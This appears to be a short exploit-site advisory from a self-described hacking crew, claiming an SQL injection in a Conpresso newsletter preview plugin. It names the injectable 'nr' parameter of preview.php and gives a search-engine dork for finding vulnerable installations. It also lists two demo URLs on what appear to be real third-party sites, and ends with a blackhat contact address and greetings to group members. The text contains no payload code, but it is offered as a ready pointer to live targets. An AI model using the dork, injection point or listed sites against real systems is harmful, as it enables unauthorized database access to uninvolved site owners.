##############
# Exploit Title : Newsletter-Vorschau Plugin SQL Injection
#
# Exploit Author : Emperor-Team
#
# Home : www.Emperor-team.org
#
#Link Plugin: www.conpresso4.de
#
# Security Risk : High
#
# Dork : inurl:/mod_newsletter/preview.php?action=
#
# Tested on: Linux & Windows
#
##############
#
# Location: Target/mod_newsletter/preview.php?action=preview&nr=[Sql]
#
# Demo: http://bayernfXorum.de/mod_newsletter/preview.php?action=preview&nr=370
#
# Demo2: http://cpmoXnitor.de/mod_newsletter/preview.php?action=preview&nr=4058
##############
#
# Mr.PERSIA
#
# Gmail:Persia.BlackHat@Gmail.CoM
#
##############
#
# We Are: Mr.PERSIA . MR.F@RDIN . Explo!ter . Hidden Dagger . yazdanx7 .
#
# Dr.3v1l . N3RD . Mr_Bami . H0553|N7 . greendel . trojan . Mr.RaYaN . MaMaD_SeCreT
#
# yaghi.vahshi . H0$$E!N . tm_sd68 . _exe_ . MoHaMaD-VaKeR . Tir3x . ᴀᴍɪʀ ωᴀɴᴛᴇᴅ . Phoenix_Killer . terrible_king
#
#
#############
